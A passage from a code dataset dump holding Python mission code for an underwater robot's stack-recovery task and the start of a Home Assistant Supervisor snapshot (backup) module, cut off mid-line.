Vision.Table(**vals)\n self.table = self.table_mapping.map(table if table.visible else None)\n\n def debug_locations(self, objects, index_offset, coord_offset=(0, 0)):\n vision_debug = shm.vision_debug.get()\n for i, obj in enumerate(objects):\n if obj is not None and obj.visible:\n setattr(vision_debug, 'x{}'.format(i + index_offset), int(obj.x + coord_offset[0]))\n setattr(vision_debug, 'y{}'.format(i + index_offset), int(obj.y + coord_offset[1]))\n setattr(vision_debug, 'text{}'.format(i + index_offset), bytes(str(i + index_offset), encoding='utf-8'))\n else:\n setattr(vision_debug, 'text{}'.format(i + index_offset), b'')\n\n shm.vision_debug.set(vision_debug)\n\nExtendAmlan = lambda: SetActuators(['piston_extend'], ['piston_retract'])\nRetractAmlan = lambda: SetActuators(['piston_retract'], ['piston_extend'])\n#ExtendAmlan = NoOp\n#RetractAmlan = NoOp\n\nclass Recovery(Task):\n initial_surface_retries = 10\n get_stack_retries = 10\n\n def on_first_run(self, vision, reset_state=True, *args, **kwargs):\n RetractAmlan()()\n if reset_state:\n w = world.get()\n w.stacks_on_tower = 4\n w.first_hstack_removed = 0\n w.grabber_stack_present = 0\n w.stacks_on_table = 0\n w.spiral_search_timed_out = 0\n world.set(w)\n\n initial_depth = shm.kalman.depth.get()\n get_stack = lambda: Retry(lambda: GetStack(vision), self.get_stack_retries)\n\n self.task = SequentialSuccess(subtasks=(\n [Retry(lambda: SequentialSuccess(\n Log('Performing initial surface'),\n MoveAboveTower(vision),\n Surface(),\n ), self.initial_surface_retries)] +\n [SequentialSuccess(\n get_stack(),\n Surface(),\n MoveAwayFromWall() if i == 0 else NoOp(),\n PlaceStack(vision)) for i in range(4)] +\n [Log('Finished recovery, returning to original depth'), Depth(initial_depth)]\n ))\n\n def on_run(self, vision, *args, **kwargs):\n if world.spiral_search_timed_out.get():\n self.loge('Timed out spiral search, exiting')\n self.finish()\n return\n\n if not self.task.finished:\n self.task()\n else:\n self.finish()\n if self.task.success:\n self.logi('Success!')\n else:\n self.loge('Failure :(')\n\n def on_finish(self, *args, **kwargs):\n RetractAmlan()()\n\nclass GetStack(Task):\n \"\"\"\n Pick up one stack from the tower, including moving to the tower and grabbing a stack\n \"\"\"\n def on_first_run(self, vision, *args, **kwargs):\n self.success = False\n self.choose_and_grab = ChooseAndGrab(vision)\n self.task = 
SequentialSuccess(\n MoveAboveTower(vision),\n self.choose_and_grab,\n )\n\n def on_run(self, vision, *args, **kwargs):\n if not self.task.finished:\n self.task()\n else:\n self.success = self.task.success\n self.finish(vision)\n\n def on_finish(self, vision, *args, **kwargs):\n if self.success:\n self.logi('Successfully grabbed stack!')\n world.stacks_on_tower.set(sum(s is not None for s in vision.stacks))\n choice = self.choose_and_grab.grab_choice\n world.grabber_stack_present.set(1)\n world.grabber_stack_red.set(choice.red)\n if choice.heading is not None:\n world.first_hstack_removed.set(1)\n world.second_hstack_heading.set((choice.heading + 180) % 360)\n else:\n self.loge('Failed to grab stack')\n RetractAmlan()()\n\nclass ChooseAndGrab(Task):\n \"\"\"\n Choose a stack and try to grab it\n\n Begin: above tower looking at stacks\n \"\"\"\n def on_first_run(self, vision, *args, **kwargs):\n self.success = False\n self.grab_choice = choose_next_stack(vision)\n if self.grab_choice.error_msg is not None:\n self.loge(self.grab_choice.error_msg)\n self.finish()\n return\n self.logi('Chose to grab {} {} stack at index {}'.format(\n 'red' if self.grab_choice.red else 'green',\n 'vertical' if self.grab_choice.vertical else 'horizontal',\n self.grab_choice.index,\n ))\n\n grab_task = None\n if self.grab_choice.vertical:\n grab_task = GrabVerticalStack(vision, self.grab_choice.index)\n else:\n grab_task = GrabHorizontalStack(\n vision, self.grab_choice.index, self.grab_choice.heading)\n\n initial_stacks = sum(stack is not None and stack.visible for stack in vision.stacks)\n self.task = SequentialSuccess(\n GrabAndRestore(vision, grab_task),\n VerifyGrab(vision, initial_stacks),\n )\n\n def on_run(self, vision, *args, **kwargs):\n if self.has_ever_finished:\n return\n if not self.task.finished:\n self.task()\n else:\n self.success = self.task.success\n self.finish()\n\nclass GrabAndRestore(Task):\n \"\"\"\n Attempt to grab a stack and restore our initial position after\n \"\"\"\n def on_first_run(self, vision, grab_task, *args, **kwargs):\n self.success = False\n\n north, east, depth = aslam.sub.position()\n self.task = Sequential(\n grab_task,\n\n Log('Moving to position before grab attempt'),\n Depth(depth),\n GoToPosition(north, east, optimize=False),\n )\n\n def on_run(self, vision, grab_task, *args, **kwargs):\n if not self.task.finished:\n self.task()\n else:\n self.success = grab_task.success\n self.finish()\n\nclass VerifyGrab(Task):\n \"\"\"\n Check if the number of stacks on the tower is less than what we started\n with\n \"\"\"\n def on_first_run(self, vision, original_stacks, *args, **kwargs):\n if original_stacks > 1:\n self.downward_target = SequentialSuccess(\n DownwardTargetObjects(vision, lambda: vision.stacks),\n Zero(),\n )\n else:\n self.downward_target = Success(Log('Not targeting stacks to verify grab, none should remain'))\n\n def on_run(self, vision, original_stacks, *args, **kwargs):\n if not self.downward_target.finished:\n self.downward_target()\n else:\n current_stacks = sum(stack is not None for stack in vision.stacks)\n self.success = self.downward_target.success and current_stacks < original_stacks\n if not self.success:\n self.loge('Grab failed, started with {} stacks but {} remain'.format(\n original_stacks, current_stacks))\n\n # TODO fix\n # self.success = True\n self.finish()\n\nclass Search(Task):\n def on_first_run(self, *args, **kwargs):\n self.task = Timeout(Sequential(\n # Pause initially to give object-identifying tasks time to check current state\n 
Timer(0.5), SpiralSearch(\n relative_depth_range=0,\n optimize_heading=True,\n meters_per_revolution=1,\n min_spin_radius=1,\n )), 120)\n\n def on_run(self, *args, **kwargs):\n if not self.task.finished:\n self.task()\n elif not self.task.success:\n self.loge('Timed out while spiral searching')\n world.spiral_search_timed_out.set(1)\n\nclass MoveAboveTower(Task):\n \"\"\"\n Move to above the tower as quickly as possible given the current known information\n \"\"\"\n # TODO: support pinger tracking\n min_search_stacks = 2\n default_altitude = 2.8\n\n def on_first_run(self, vision, *args, **kwargs):\n self.success = False\n\n stacks_on_tower = world.stacks_on_tower.get()\n go_to_tower = None\n if stacks_on_tower < 4: # Only rely on tower position after we've picked up a stack\n north = world.tower_north.get()\n east = world.tower_east.get()\n depth = world.tower_depth.get()\n\n go_to_tower = Sequential(\n Log('Returning to tower position ({}, {}, {})'.format(north, east, depth)),\n Depth(depth), # Move to tower depth early so we don't crash into tower\n GoToPosition(north, east, optimize=True),\n )\n\n else:\n go_to_tower = Sequential(\n Log('Going to default tower altitude of {}'.format(self.default_altitude)),\n Altitude(self.default_altitude),\n )\n\n search_tower = None\n if stacks_on_tower > 0:\n search_stacks = 2 if stacks_on_tower == 4 else 1\n search_tower = Sequential(\n Log('Searching for tower'),\n Altitude(self.default_altitude),\n MasterConcurrent(\n IdentifyObjects(lambda: vision.stacks, min_objects=search_stacks),\n Search(),\n ),\n )\n else:\n search_tower = Log('Not searching for tower, no stacks on tower')\n\n center_tower = None\n if stacks_on_tower > 0:\n center_tower = SequentialSuccess(\n Log('Centering tower'),\n DownwardTargetObjects(vision, lambda: vision.stacks),\n Zero(),\n )\n else:\n center_tower = Log('No stacks on tower, not centering')\n\n self.task = SequentialSuccess(go_to_tower, search_tower, center_tower)\n\n def on_run(self, vision, *args, **kwargs):\n if not self.task.finished:\n self.task()\n\n else:\n if self.task.success:\n self.success = True\n north, east, depth = aslam.sub.position()\n world.tower_north.set(north)\n world.tower_east.set(east)\n world.tower_depth.set(depth)\n else:\n self.loge('Failed to move above tower')\n\n self.finish()\n\nclass IdentifyObjects(Task):\n \"\"\"\n Finish when some objects we are looking for are in view\n \"\"\"\n def on_run(self, objects_func, min_objects=1, *args, **kwargs):\n n = sum(obj is not None and obj.visible for obj in objects_func())\n if n >= min_objects:\n self.finish()\n\nclass DownwardTargetObjects(Task):\n \"\"\"\n Downward target the center of all provided objects\n\n Begin: at least one object in view\n End: center of all objects in center of camera\n \"\"\"\n ps = [0.002, 0.002, 0.001]\n deadbands = [(40, 40), (30, 30), (20, 20)]\n\n def centroid(self, objects):\n total_objects = 0\n center_x, center_y = 0, 0\n for obj in objects:\n if obj is not None and obj.visible:\n center_x += obj.x\n center_y += obj.y\n total_objects += 1\n\n center_x /= total_objects\n center_y /= total_objects\n return (center_x, center_y)\n\n def on_first_run(self, vision, objects_func, precision=0, *args, **kwargs):\n self.task = ConsistentTask(DownwardTarget(\n point=lambda: self.centroid(self.objects),\n target=vision.cam_center,\n deadband=self.deadbands[precision],\n px=self.ps[precision],\n py=self.ps[precision],\n ))\n\n def on_run(self, vision, objects_func, *args, **kwargs):\n self.success = False\n\n 
self.objects = objects_func()\n num_objects = sum(obj is not None and obj.visible for obj in self.objects)\n if num_objects == 0:\n self.loge(\"Can't see any objects, targeting aborted\")\n self.finish()\n return\n\n self.task()\n if self.task.finished:\n self.success = True\n self.finish()\n\nGrabChoice = namedtuple('GrabChoice', ['error_msg', 'index', 'red', 'vertical', 'heading'])\n\ndef choose_next_stack(vision):\n \"\"\"\n Decide which stack to grab on the tower\n\n Current stack schedule: Pick up all vertical stacks, then all horizontal stacks.\n Needs to above the tower with all stacks in vision.\n \"\"\"\n HORIZONTAL_ASPECT_RATIO = 2\n\n failedChoice = lambda info: GrabChoice(info, None, None, None, None)\n\n vstack_indices, hstack_indices = [], []\n for i, stack in enumerate(vision.stacks):\n if stack is not None:\n if stack.aspect_ratio >= HORIZONTAL_ASPECT_RATIO:\n hstack_indices.append(i)\n else:\n vstack_indices.append(i)\n\n target_indices = None\n if len(hstack_indices) == 2 or \\\n (len(hstack_indices) == 1 and world.first_hstack_removed.get()):\n target_indices = hstack_indices\n else:\n target_indices = vstack_indices\n if len(target_indices) == 0:\n return failedChoice('No stacks found to grab')\n if len(target_indices) > 2:\n # return failedChoice('More than 2 {} stacks found, cannot grab'.format(\n # 'vertical' if target_indices is vstack_indices else 'horizontal'))\n target_indices = target_indices[:2]\n\n target_index = target_indices[int(random.random() * len(target_indices))]\n target_stack = vision.stacks[target_index]\n\n heading = None\n if target_index in hstack_indices:\n if len(hstack_indices) == 2:\n target_pos = np.array([target_stack.x, target_stack.y])\n other_index = None\n if target_index == hstack_indices[0]:\n other_index = hstack_indices[1]\n else:\n other_index = hstack_indices[0]\n other_stack = vision.stacks[other_index]\n\n avg_pos = np.array([\n (target_stack.x + other_stack.x) / 2,\n (target_stack.y + other_stack.y) / 2,\n ])\n stack_vec = target_pos - avg_pos\n\n heading = None\n heading = math.degrees(math.atan2(stack_vec[0], -stack_vec[1]))\n heading += shm.kalman.heading.get() # Now a global heading\n heading -= 90 # Align to the stack on the port side\n heading %= 360\n\n elif len(hstack_indices) == 1:\n heading = world.second_hstack_heading.get()\n\n return GrabChoice(\n error_msg=None,\n index=target_index,\n red=target_stack.red,\n vertical=target_index in vstack_indices,\n heading=heading,\n )\n\nclass GradualHeading(Task):\n relative_desire = 15\n deadband = 25\n\n def on_run(self, desire, *args, **kwargs):\n current = shm.kalman.heading.get()\n diff = heading_sub_degrees(desire, current)\n relative = math.copysign(self.relative_desire, diff)\n RelativeToCurrentHeading(relative)()\n if abs(diff) < self.deadband:\n self.finish()\n\nclass RelativeGradualDepth(Task):\n relative_desire = 0.2\n deadband = 0.05\n\n def on_first_run(self, offset, *args, **kwargs):\n self.desire = shm.kalman.depth.get() + offset\n\n def on_run(self, *args, **kwargs):\n diff = self.desire - shm.kalman.depth.get()\n relative = math.copysign(self.relative_desire, diff)\n RelativeToCurrentDepth(relative)()\n if abs(diff) < self.deadband:\n self.finish()\n\nclass GrabStack(Task):\n \"\"\"\n Grabs the stack at the given index at the given approximate heading\n \"\"\"\n align_p = 0.5\n align_deadband = 3\n scooch_retries = 20\n\n def on_first_run(self, vision, stack_i, timeout, dive_task, offset_task=None, approx_heading=None, snap_move=None, slide_move=None, *args, 
**kwargs):\n self.success = False\n self.must_see_stack = True\n initial_stack = vision.stacks[stack_i]\n if initial_stack is None:\n return\n self.color = 'red' if initial_stack.red else 'green'\n\n downward_target = lambda precision=0: DownwardTargetObjects(vision, lambda: [vision.stacks[stack_i]], precision=precision)\n precise_align = PIDLoop(\n lambda: vision.stacks[stack_i].angle,\n RelativeToCurrentHeading(),\n target=90,\n negate=True,\n p=self.align_p,\n deadband=self.align_deadband,\n )\n\n def ignore_stack():\n self.must_see_stack = False\n\n self.task = Timeout(SequentialSuccess(\n Log('Aligning to stack'),\n downward_target(),\n Zero(),\n\n Log('Going down and precisely aligning to stack'),\n Concurrent(\n Sequential(\n GradualHeading(approx_heading),\n precise_align,\n finite=False,\n ) if approx_heading is not None else NoOp(),\n downward_target(precision=2),\n dive_task,\n finite=False,\n ),\n PositionalControl(),\n Zero(),\n\n FunctionTask(ignore_stack),\n Sequential(\n Log('Applying offset'),\n offset_task,\n ) if offset_task is not None else NoOp(),\n\n Log('Moving to stack'),\n snap_move if snap_move is not None else NoOp(),\n\n Log('Scooching away from stack'),\n Scooch(lambda: vision.blockers[self.color]),\n\n Log('Extending Amlan'),\n ExtendAmlan(),\n Timer(2),\n\n Log('Sliding stack'),\n Success(Timeout(slide_move, 10)) if slide_move is not None else NoOp(),\n\n Log('Hopefully grabbed stack'),\n ), timeout)\n\n def on_run(self, vision, stack_i, timeout, *args, **kwargs):\n if self.must_see_stack and vision.stacks[stack_i] is None:\n self.loge('Lost stack')\n Zero()()\n self.finish()\n return\n\n if not self.task.finished:\n self.task()\n else:\n self.finish()\n if self.task.success:\n self.success = True\n else:\n self.loge('Failed grab')\n\nclass ConsistentTask(Task):\n \"\"\"\n Checks to make sure a non-finite task consistently is finished\n \"\"\"\n def on_first_run(self, task, success=18, total=20, *args, **kwargs):\n self.cons_check = ConsistencyCheck(success, total)\n\n def on_run(self, task, *args, **kwargs):\n task()\n if self.cons_check.check(task.finished):\n self.finish()\n\nMoveGrabberToCamera = lambda: ConsistentTask(MoveXY((-0.04064, 0.1), deadband=0.015))\n\ndef GrabVerticalStack(vision, stack_i):\n return GrabStack(\n vision, stack_i,\n timeout=60,\n dive_task=Altitude(constants.stack_dive_altitude),\n offset_task=MoveGrabberToCamera(),\n snap_move=Altitude(constants.vstack_grab_altitude),\n )\n\ndef GrabHorizontalStack(vision, stack_i, approx_heading):\n return GrabStack(\n vision, stack_i,\n timeout=90,\n dive_task=Altitude(constants.stack_dive_altitude),\n offset_task=MoveGrabberToCamera(),\n approx_heading=approx_heading,\n snap_move=Altitude(constants.hstack_grab_altitude),\n slide_move=MoveY(0.4),\n )\n\nclass Altitude(Task):\n min_depth = 0.5\n\n def on_first_run(self, altitude, p=0.5, d=0.1, *args, **kwargs):\n self.task = PIDLoop(\n shm.dvl.savg_altitude.get,\n RelativeToCurrentDepth(),\n target=altitude,\n p=p,\n d=d,\n negate=True,\n deadband=0.05,\n )\n\n def on_run(self, *args, **kwargs):\n if not self.task.finished:\n self.task()\n if shm.navigation_desires.depth.get() < self.min_depth:\n self.loge('Min depth reached, preventing surface and exiting')\n shm.navigation_desires.depth.set(self.min_depth)\n self.finish()\n else:\n self.finish()\n\nclass AltitudeUntilStop(Task):\n \"\"\"\n Attempt to move to the target altitude until the sub gets stuck\n \"\"\"\n def on_first_run(self, altitude, *args, **kwargs):\n self.min_speed = 0.008\n 
self.min_delta = 0.1\n self.deque_size = 20\n\n self.success = False\n self.altitude_task = Altitude(altitude, p=0.3)\n self.stop_cons_check = ConsistencyCheck(3, 3)\n self.readings = deque()\n self.initial_altitude = shm.dvl.savg_altitude.get()\n self.last_altitude = self.initial_altitude\n\n def on_run(self, altitude, *args, **kwargs):\n if not self.altitude_task.has_ever_finished:\n self.altitude_task()\n current_altitude = shm.dvl.savg_altitude.get()\n self.readings.append((current_altitude, time.time()))\n if len(self.readings) > self.deque_size:\n self.readings.popleft()\n\n if abs(current_altitude - self.initial_altitude) >= self.min_delta and \\\n len(self.readings) >= self.deque_size:\n delta_altitude = self.readings[-1][0] - self.readings[0][0]\n delta_time = self.readings[-1][1] - self.readings[0][1]\n speed = abs(delta_altitude / delta_time)\n\n if self.stop_cons_check.check(speed < self.min_speed):\n self.logi('Stopped changing altitude, finishing')\n self.success = True\n self.finish()\n else:\n self.loge('Bounding altitude reached')\n self.finish()\n\nclass Scooch(Task):\n \"\"\"\n Scooch over to the right a little and check if we still see a blocking\n stack\n \"\"\"\n distance_inc = 0.01\n max_distance = 0.5\n\n def on_first_run(self, blocking_func, *args, **kwargs):\n self.success = False\n self.distance_checker = CheckDistance(self.max_distance)\n\n def on_run(self, blocking_func, *args, **kwargs):\n if blocking_func() is None:\n self.success = True\n self.finish()\n\n if not self.distance_checker.finished:\n MoveY(self.distance_inc)()\n self.distance_checker()\n else:\n self.loge('Scooched too far, stack still blocking')\n self.finish()\n\n def on_finish(self, *args, **kwargs):\n Zero()()\n\nclass Wiggle(Task):\n def on_first_run(self, *args, **kwargs):\n self.task = Sequential(\n MoveX(-0.05, deadband=0.03),\n MoveX(0.1, deadband=0.04),\n MoveX(-0.1, deadband=0.04),\n MoveX(0.1, deadband=0.04),\n MoveX(-0.1, deadband=0.04),\n MoveX(0.1, deadband=0.04),\n MoveX(-0.1, deadband=0.04),\n MoveX(0.05, deadband=0.03),\n )\n\n def on_run(self, *args, **kwargs):\n if not self.task.finished:\n self.task()\n else:\n self.finish()\n\nclass Surface(Task):\n \"\"\"\n Breaches the surface of the water inside the octogon for a fixed time\n\n Begin: Sub centered and zeroed directly over tower\n End: Sub slightly below surface\n \"\"\"\n # Don't surface to a negative depth, it pushes bubbles under the sub onto the camera and dvl\n pre_surface_depth = 0.5\n surface_depth = 0\n surface_time = 3\n\n def on_first_run(self, *args, **kwargs):\n original_depth = shm.kalman.depth.get()\n\n self.task = Sequential(\n Log('Rising to just below surface'),\n PositionalControl(),\n Depth(self.pre_surface_depth),\n\n Log('Surfacing!'),\n MasterConcurrent(Timer(self.surface_time), Depth(self.surface_depth)),\n\n Log('Falling back below surface'),\n Depth(original_depth),\n )\n\n def on_run(self, *args, **kwargs):\n if not self.task.finished:\n self.task()\n else:\n self.finish()\n\nMoveAwayFromWall = lambda: Sequential(\n Log('Moving away from wall'),\n Heading(WALL_TOWER_HEADING),\n MoveX(2),\n)\n\nclass PlaceStack(Task):\n \"\"\"\n Locate the table and place the stack we're holding on it\n\n Begin: holding a stack\n End: above the table after placing stack\n \"\"\"\n move_above_table_retries = 10\n drop_stack_retries = 4\n\n def on_first_run(self, vision, *args, **kwargs):\n self.task = SequentialSuccess(\n Log('Moving above table'),\n Retry(lambda: MoveAboveTable(vision), 
self.move_above_table_retries),\n\n Log('Dropping stack'),\n Conditional(Retry(lambda: DropStack(vision), self.drop_stack_retries), on_failure=Sequential(\n Log('Failed to drop stack normally, performing blind drop', level='error'),\n DropStack(vision, blind=True),\n )),\n )\n\n def on_run(self, vision, *args, **kwargs):\n if not self.task.finished:\n self.task()\n else:\n self.finish()\n\n def on_finish(self, *args, **kwargs):\n self.success = self.task.success\n if self.success:\n world.stacks_on_table.set(world.stacks_on_table.get() + 1)\n else:\n self.loge('Failed to place stack')\n\nclass MoveAboveTable(Task):\n \"\"\"\n Move to above the table as quickly as possible given the current known information\n\n Start: Anywhere\n End: Zeroed centered on the table\n \"\"\"\n default_altitude = 2.6\n\n def on_first_run(self, vision, *args, **kwargs):\n self.success = False\n\n if world.stacks_on_table.get() > 0:\n north = world.table_north.get()\n east = world.table_east.get()\n depth = world.table_depth.get()\n\n self.task = SequentialSuccess(\n Log('Returning to table position ({}, {}, {})'.format(north, east, depth)),\n GoToPosition(north, east, optimize=True),\n Depth(depth), # Move to table depth late so we don't crash into tower\n\n Log('Searching for table'),\n MasterConcurrent(IdentifyObjects(lambda: [vision.table]), Search()),\n\n Log('Centering table'),\n DownwardTargetObjects(vision, lambda: [vision.table]),\n Zero(),\n )\n\n else:\n def record_position():\n north, east, depth = aslam.sub.position()\n world.table_north.set(north)\n world.table_east.set(east)\n world.table_depth.set(depth)\n\n self.task = SequentialSuccess(\n Log('Searching for table'),\n MasterConcurrent(IdentifyObjects(lambda: [vision.table]), Search()),\n\n Log('Centering table'),\n DownwardTargetObjects(vision, lambda: [vision.table]),\n\n Log('Moving to default table altitude'),\n Altitude(self.default_altitude),\n\n # Log('Centering colored table regions'),\n # DownwardTargetObjects(vision, lambda: vision.regions, precision=1),\n # Zero(),\n\n Log('Recording table position'),\n FunctionTask(record_position),\n )\n\n def on_run(self, vision, *args, **kwargs):\n if not self.task.finished:\n self.task()\n\n else:\n if self.task.success:\n self.success = True\n\n # The best time to record position is if we've never placed a\n # stack\n if world.stacks_on_table.get() == 0:\n north, east, depth = aslam.sub.position()\n world.table_north.set(north)\n world.table_east.set(east)\n world.table_depth.set(depth)\n else:\n self.loge('Failed to move above table')\n\n self.finish()\n\nclass DropStack(Task):\n \"\"\"\n Try dropping the stack we're holding on the given mark color once\n\n Start: target mark visible in downcam\n End: above the table with stack dropped, or not\n \"\"\"\n precise_align_altitude = 1.6\n drop_altitude = 0.6\n retract_amlan_time = 1\n after_drop_depth_delta = -0.5\n\n def on_first_run(self, vision, blind=False, *args, **kwargs):\n self.success = False\n\n if not world.grabber_stack_present.get():\n self.loge('No stack present in grabber, cannot drop')\n self.finish()\n red = world.grabber_stack_red.get()\n\n def empty_grabber():\n world.grabber_stack_present.set(0)\n\n target_region = lambda precision=0: DownwardTargetObjects(\n vision, lambda: [vision.regions[0 if red else 1]], precision=precision)\n\n self.task = SequentialSuccess(\n SequentialSuccess(\n Log('Targeting {} region'.format('red' if red else 'green')),\n target_region(),\n\n Log('Going down to target region more accurately'),\n 
Concurrent(\n Altitude(self.precise_align_altitude),\n target_region(precision=2),\n finite=False,\n ),\n ) if not blind else NoOp(),\n\n PositionalControl(),\n Zero(),\n\n Log('Aligning target with grabber'),\n MoveGrabberToCamera(),\n\n Log('Going down to drop'),\n Altitude(self.drop_altitude),\n\n Log('Retracting Amlan'),\n RetractAmlan(),\n Timer(self.retract_amlan_time),\n FunctionTask(empty_grabber),\n\n Log('Moving up away from table slowly'),\n RelativeGradualDepth(self.after_drop_depth_delta),\n )\n\n def on_run(self, vision, *args, **kwargs):\n if self.has_ever_finished:\n return\n\n if not self.task.finished:\n self.task()\n else:\n self.success = self.task.success\n self.finish()\n if not self.success:\n self.loge('Failed to drop stack')\n\nclass VisionTask(Task):\n def on_first_run(self, task_class, *args, **kwargs):\n self.vision = Vision()\n task = task_class(self.vision, *args, **kwargs)\n self.task = Sequential(Timer(1), task)\n\n def on_run(self, *args, **kwargs):\n if not self.task.finished:\n try:\n camera = get_downward_camera()\n self.vision(camera)\n self.task()\n except RuntimeError:\n self.loge('Vision not running, refusing to run mission')\n else:\n self.finish()\n\ndef SimulatedTask(task):\n def update_altitude():\n shm.dvl.savg_altitude.set(3 - shm.kalman.depth.get())\n\n return MasterConcurrent(task, FunctionTask(update_altitude, finite=False))\n\nclass OptimalRecovery(Task):\n def desiredModules(self):\n return [shm.vision_modules.Recovery]\n\n def on_first_run(self):\n self.subtask = recovery()\n self.has_made_progress = True\n # TODO @AlexO Update when we've made progress! (first successful center on tower? first grabbed stack confirmed?)\n\n def on_run(self):\n self.subtask()\n if self.subtask.finished:\n self.finish()\n\nclass DownCalibrate(Task):\n def on_first_run(self, vision, stack_i, *args, **kwargs):\n self.align = DownwardTargetObjects(vision, lambda: [vision.stacks[stack_i]])\n\n def on_run(self, *args, **kwargs):\n self.align()\n if self.align.finished and not self.align.success:\n VelocityX(0)()\n VelocityY(0)()\n\nclass IdentifyTowerByPinger(Task):\n def on_first_run(self, vision, *args, **kwargs):\n self.task = ConsistentTask(IdentifyObjects(lambda: vision.stacks, min_objects=3), 28, 30)\n\n def on_run(self, *args, **kwargs):\n if not self.task.finished:\n self.task()\n else:\n self.finish()\n\nidentify_tower_by_pinger = lambda: VisionTask(IdentifyTowerByPinger)\n\nrecovery = lambda: VisionTask(Recovery)\nrecovery_noreset = lambda: VisionTask(Recovery, reset=False)\nsim_recovery = lambda: SimulatedTask(recovery())\nvision = lambda: Vision(get_downward_camera())\ngrab_vstack = lambda: VisionTask(GrabVerticalStack, 1)\nsim_grab_vstack = lambda: SimulatedTask(grab_vstack())\ngrab_hstack = lambda: VisionTask(GrabHorizontalStack, 3, 0)\naltitude_until_stop = lambda: AltitudeUntilStop(1)\nmove = lambda: MoveXYRough((-1, 0.5))\ngo_to_position = lambda: GoToPosition(0, 0, optimize=True)\naltitude = lambda: Sequential(Altitude(2), Altitude(3), Altitude(3.5), Altitude(4))\n\nsim_move_above_tower = lambda: SimulatedTask(VisionTask(MoveAboveTower))\nsim_get_stack = lambda: SimulatedTask(VisionTask(GetStack))\nsequential_success = lambda: SequentialSuccess(Timeout(NoOp(finite=False), 1), Log('next'))\n\ndef load_grabber():\n world.grabber_stack_present.set(1)\nplace_stack = lambda: Sequential(FunctionTask(load_grabber), VisionTask(PlaceStack))\n\nsim_place_stack = lambda: SimulatedTask(VisionTask(PlaceStack))\nsurface = lambda: Surface()\n\ncalibrate = 
VisionTask(DownCalibrate, 1)\nconditional = Conditional(NoOp(), on_failure=Log('oh no'))\ngradual = lambda: RelativeGradualDepth(-0.5)\n","sub_path":"mission/missions/recovery.py","file_name":"recovery.py","file_ext":"py","file_size_in_byte":38928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"494032025","text":"\"\"\"Representation of a snapshot file.\"\"\"\nimport asyncio\nfrom base64 import b64decode, b64encode\nimport json\nimport logging\nfrom pathlib import Path\nimport tarfile\nfrom tempfile import TemporaryDirectory\nfrom typing import Any, Dict, Optional\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import padding\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nimport voluptuous as vol\nfrom voluptuous.humanize import humanize_error\n\nfrom ..const import (\n ATTR_ADDONS,\n ATTR_AUDIO_INPUT,\n ATTR_AUDIO_OUTPUT,\n ATTR_BOOT,\n ATTR_CRYPTO,\n ATTR_DATE,\n ATTR_FOLDERS,\n ATTR_HOMEASSISTANT,\n ATTR_IMAGE,\n ATTR_LAST_VERSION,\n ATTR_NAME,\n ATTR_PORT,\n ATTR_PROTECTED,\n ATTR_REFRESH_TOKEN,\n ATTR_REPOSITORIES,\n ATTR_SIZE,\n ATTR_SLUG,\n ATTR_SSL,\n ATTR_TYPE,\n ATTR_VERSION,\n ATTR_WAIT_BOOT,\n ATTR_WATCHDOG,\n CRYPTO_AES128,\n FOLDER_HOMEASSISTANT,\n)\nfrom ..coresys import CoreSys, CoreSysAttributes\nfrom ..exceptions import AddonsError\nfrom ..utils.json import write_json_file\nfrom ..utils.tar import SecureTarFile, exclude_filter, secure_path\nfrom .utils import key_to_iv, password_for_validating, password_to_key, remove_folder\nfrom .validate import ALL_FOLDERS, SCHEMA_SNAPSHOT\n\n_LOGGER: logging.Logger = logging.getLogger(__name__)\n\nMAP_FOLDER_EXCLUDE = {\n FOLDER_HOMEASSISTANT: [\n \"*.db-wal\",\n \"*.db-shm\",\n \"__pycache__/*\",\n \"*.log\",\n \"OZW_Log.txt\",\n ]\n}\n\n\nclass Snapshot(CoreSysAttributes):\n \"\"\"A single Supervisor snapshot.\"\"\"\n\n def __init__(self, coresys: CoreSys, tar_file: Path):\n \"\"\"Initialize a snapshot.\"\"\"\n self.coresys: CoreSys = coresys\n self._tarfile: Path = tar_file\n self._data: Dict[str, Any] = {}\n self._tmp = None\n self._key: Optional[bytes] = None\n self._aes: Optional[Cipher] = None\n\n @property\n def slug(self):\n \"\"\"Return snapshot slug.\"\"\"\n return self._data.get(ATTR_SLUG)\n\n @property\n def sys_type(self):\n \"\"\"Return snapshot type.\"\"\"\n return self._data.get(ATTR_TYPE)\n\n @property\n def name(self):\n \"\"\"Return snapshot name.\"\"\"\n return self._data[ATTR_NAME]\n\n @property\n def date(self):\n \"\"\"Return snapshot date.\"\"\"\n return self._data[ATTR_DATE]\n\n @property\n def protected(self):\n \"\"\"Return snapshot date.\"\"\"\n return self._data.get(ATTR_PROTECTED) is not None\n\n @property\n def addons(self):\n \"\"\"Return snapshot date.\"\"\"\n return self._data[ATTR_ADDONS]\n\n @property\n def addon_list(self):\n \"\"\"Return a list of add-ons slugs.\"\"\"\n return [addon_data[ATTR_SLUG] for addon_data in self.addons]\n\n @property\n def folders(self):\n \"\"\"Return list of saved folders.\"\"\"\n return self._data[ATTR_FOLDERS]\n\n @property\n def repositories(self):\n \"\"\"Return snapshot date.\"\"\"\n return self._data[ATTR_REPOSITORIES]\n\n @repositories.setter\n def repositories(self, value):\n \"\"\"Set snapshot date.\"\"\"\n self._data[ATTR_REPOSITORIES] = value\n\n @property\n def homeassistant_version(self):\n \"\"\"Return snapshot Home Assistant version.\"\"\"\n return self._data[ATTR_HOMEASSISTANT].get(ATTR_VERSION)\n\n @property\n def 
homeassistant(self):\n \"\"\"Return snapshot Home Assistant data.\"\"\"\n return self._data[ATTR_HOMEASSISTANT]\n\n @property\n def size(self):\n \"\"\"Return snapshot size.\"\"\"\n if not self.tarfile.is_file():\n return 0\n return round(self.tarfile.stat().st_size / 1048576, 2) # calc mbyte\n\n @property\n def is_new(self):\n \"\"\"Return True if there is new.\"\"\"\n return not self.tarfile.exists()\n\n @property\n def tarfile(self):\n \"\"\"Return path to Snapshot tarfile.\"\"\"\n return self._tarfile\n\n def new(self, slug, name, date, sys_type, password=None):\n \"\"\"Initialize a new snapshot.\"\"\"\n # Init metadata\n self._data[ATTR_SLUG] = slug\n self._data[ATTR_NAME] = name\n self._data[ATTR_DATE] = date\n self._data[ATTR_TYPE] = sys_type\n\n # Add defaults\n self._data = SCHEMA_SNAPSHOT(self._data)\n\n # Set password\n if password:\n self._init_password(password)\n self._data[ATTR_PROTECTED] = password_for_validating(password)\n self._data[ATTR_CRYPTO] = 